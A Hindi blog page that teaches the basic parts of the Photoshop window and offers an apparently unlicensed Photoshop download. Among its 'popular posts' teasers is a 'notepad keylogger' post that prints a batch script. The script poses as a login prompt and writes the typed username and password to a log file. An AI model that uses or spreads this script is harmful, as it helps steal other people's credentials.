Skip to main content

फोटोशॉप सीखे हिंदी में - Learn Photoshop in Hindi

Hello . friends aj me jo artical likh raha hun ye un bhaiyo k lie hai jinhe photo shop ka koi bhi knowledge nai hai or kisi karan se sikh nai paye ho to bs muje follow krte jaiye or kuch hi dino me apki problem solve ....
.
.

Starting Photoshop फोटोशॉप प्रारम्भ
करना-
फोटोशॉप को प्रारम्भ करने से पहले आपको देख
लेना है की फोटोशॉप आपके कंप्यूटर में स्थापित
(Install) है या नहीं यदि नहीं है तो आप अपनी पसंद
का Photoshop Version निचे दिए गए लिंक से
Download करें और उसे अपने कंप्यूटर में स्थापित
(Install) करें.
Start बटन पर क्लिक करें इससे Start Menu खुल
जायेगा यहाँ आपको Photoshop का आइकॉन
दिखाई देगा उस पर क्लिक करें आपका फोटोशॉप
शुरु हो जायेगा ?

 Adobe Photoshop 7.0 Full
Version Free Download

Main Window of Photoshop! फोटोशॉप
की मुख्य विंडो–
फोटोशॉप की मुख्य विंडो में आपको इसके
विभिन्न भाग दिखाई देंगे इस विंडो के सभी मुख्य
भागों का परिचय निम्न प्रकार है-
Title Bar (टाइटल बार) : 
फोटोशॉप विंडो में सबसे
ऊपर टाइटल बार होता है ! इसमें प्रोग्राम का नाम
और यदि फोटोशॉप की कोई फाइल खुली हो तो
उसका भी नाम दिखाया जाता है ! इस बार के
दाएँ किनारे पर तीन छोटे बटन बने होते है : न्यूनतम,
अधिकतम/रिस्टोर तथा बंद, जिनसे इस विंडो के
आकार को कण्ट्रोल किया जाता है !
Menu Bar (मेनू बार) : 
टाइटल बार से ठीक निचे
मेनूबार होता है जिसमें फोटोशॉप के विभिन्न
मेन्युओं के नाम दिए जाते है ! किसी मेनू के नाम को
क्लिक करने पर वह मेनू निचे की और खुल जाता है,
जिसमे अनेक आदेश दिए होते है ! किसी आदेश को
क्लिक करने पर वह आदेश सक्रीय हो जाता है ! यदि
मेन्यु खुला हुआ है तो दाएँ-बाएँ तीर का बटन दबाने
पर उससे दायीं और का और बायी और का मेन्यु खुल
जाता है !
Tool Options Bar (टूल आप्शनस बार) :
 मेनू बार से
निचे टूल आप्शन बार होता है जिसमे किसी समय
चुने हुए अथवा सक्रिय टूल के बारे में विभिन्न
विकल्प दिए जाते है ! आप इन विकल्पों में
इच्छानुसार सेटिंग करके उस टूल का अच्छे से अच्छा
उपयोग कर सकते हैं ! जैसे ही आप टूल बदलते हैं, इस
बार का रूप भी बदल जाता है !
Toolbox (टूलबॉक्स) : 
यह फोटोशॉप का प्रमुख टूल
पैकेट होता है जिसमें फोटोशॉप में उपलब्ध सभी
कार्यों और सुविधाओं के लिए टूल उपलब्ध होते है !
किसी भी समय इनमे से एक टूल चुना हुआ होता है !
टूल बॉक्स के टूलों के बारे में इस Computer and Android tricks  में आगे विस्तार से
पढेंगे ?
Palettes (पैलेट) : फोटोशॉप में आपके कार्य को
अच्छी तरह करने में सहायता पहुचाने के लिए कई
पैलेट उपलब्ध होते है इसमें कुछ निम्न है-
Toolbox टूलबॉक्स, Navigator नेविगेटर, कलर Color,
Styles स्टाइल्स, History हिस्ट्री, Layers लेयर,
Paths पाथ
Selection Tools (सिलेक्शन टूल) : इस समूह के टूलों
का उपयोग किस चित्र को पूरा अथवा उसके
किसी भाग को चुनने में किया जाता है ! किसी
चित्र का चुना हुआ भाग जगमगाती हुई सीमा से
दिखाया जाता है ! आप किसी सिलेक्शन टूल को
क्लिक करके माउस पॉइंटर को चित्र के ऊपर माउस
बटन दबाकर खींचते है तो टूल के अनुसार चित्र का
निर्धारित आकार का भाग चुन लिया जाता है !
इस समूह के मैजिक वेंड टूल से आप रंग के अनुसार चित्र
के भाग चुन सकते है !
Painting Tools ( पेंटिंग टूल) : 
इस समूह के टूल चित्र में
रंग भरने के लिए उपयोग किये जाते है ! इसमें कई
प्रकार के ब्रश , पेंसिल, इरेज़र आदि होते है ,
जिनकी सहायता से आप ठीक उसी प्रकार रंग भर
सकते है , जिस प्रकार वास्तविक रंगों के साथ
किया जाता है ! इसके ग्रेडीएंट टूल द्वारा आप
बैकग्राउंड को एक या अधिक रंगों की छाया में
तैयार कर सकते है !
Type and Path Tools ( टाइप तथा पाथ टूल) : 
इस
समूह के टूलों द्वारा आप रेखाचित्र और आक्रतियाँ
बना सकते हैं ! किसी रेखा को फोटोशॉप में पाथ
कहा जाता है ! आप किसी पाथ के किसी भी
भाग को चुनकर उसे मनचाहा रूप में बदल सकते है !
पाथ टूलों का उपयोग चुनने और बनाने दोनों
कार्यो में किया जा सकता है !
Viewing Tools ( व्यइंग टूल ) : 
इस समूह में दो मुख्या
टूल हैं : ज़ूम टूल और हैण्ड टूल ज़ूम टूल के द्वारा आप
अपने चित्र को इच्छानुसार छोटा या बड़ा करके
देख सकते है और हैण्ड टूल के द्वारा आप चित्र को
किसी भी दिशा में सरकाकर उसमे छिपे हुए भागों
को देख सकते है , क्योंकि स्क्रीन का आकार
छोटा होने के कारन कभी कभी वह किसी चित्र
पूरा नहीं दिखाती !
टूल बॉक्स में इन सभी प्रमुख टूलों के अतिरिक्त अन्य
कई टूल होते है !
.
NOTE-:  पूरा कोर्स आने वाला है यदि आप चाहते है की कोर्स जल्दी आये तो कमेंट करें.....???
.
अगर आपके पास भी किसी
तरह
की कोई जानकारी है व आप
इस
वेबसाइट पर शेयर करन चाहते है तो हमें मेल करें।
पसन्द आने पर आपके नाम व फोटो के साथ
पोस्ट किया जायेगा
हमारा मेल ID है -

Jayantsmarty8@gmail.com

ये पोस्ट आपको कैसा लगा, हमें कमेंट कर के
बताये ! यदि
आपको कंप्यूटर या टेक्नोलॉजी से समन्धित
कोई
Question पूछना है तो हमें मेल करे !

Comments

Popular posts from this blog

create keylogger using notepad:

create keylogger using notepad: Step 1: The first step for notepad keylogger is to open a notepad of your Windows OS by pressing the Windows button in you computer. Then you need to click on the notepad option. Step 2: Once the notepad opens, you need to copy and paste the below given codes into it to make a keylogger in notepad. Make sure that there are no empty or extra spaces between the characters and sentences: @echo off color a title Login cls echo Please Enter Your Email Address And Password echo. echo. cd “C:\Logs” set /p user=Username: set /p pass=Password: echo Username=”%user%” Password=”%pass%” >> Log.txt start >>Program Here<< exit create keylogger using notepad Step 3: Once you have written the code, then you would need to save the given notepad file as logs.bat in the given desktop. notepad keylogger Step 4: After that you would need to create a new folder called logs. Here one thing that you need to keep in mind is that the...

Use dual whtsaap in one android cell

1. First take the full backup for your messages and data before going through ogwhatsapp do h dwnload 2015 & whatsmapp solo apk: 2. Clear whatsApp data (Go to App Info and click on Clear Data button as shown in below snapshot): 3. Go to /sdcard/WhatsApp folder and rename it to /sdcard/OGWhatsApp (You can use any file viewer or file explorer, below is ES File Explorer). Remember this step is only required to install ogwhatsapp apk latest version 2015, no need in whatsmapp solo apk. 4. Now uninstall Official whatsapp application from your android device. 5. Install ogwhatsapp apk latest version 2015 in google. 6. It will ask for your mobile number. Give the old number which you have installed in official Whatsapp earlier [IMPORTANT]. 7. Click OK. 8. Now your Ogwhatsapp application is ready for old number. 9. For second number to use, go to play store and download official WhatsApp application. 10. It will ask for your number. Insert your new s...

Candy Crush Saga Game Free Download For PC (For Windows)

Follow this simple steps to download candy crush for pc windows operating system. First of you have to download the software called Bluestacks Offline Installer in you windows computer. As it the best for getting candy crush saga game free download for pc 2015. After getting the download files of Bluestacks, you need to install it in your computer. This will take several times to install & its depends upon your internet speed. After the installation, it will prompt to restart you computer. So restart the windows and then you will see Bluestacks icon in the desktop, just click on it and open it. You will see the search bar at the top. Search for Candy Crush Saga on the search bar. You will get the below given screen. Just click on Install button at the right side of the Candy Crush Saga game. After the installation process complete you can then import your contacts by Synchronizing your email data or facebook in the app. That’s it. You are done with the process o...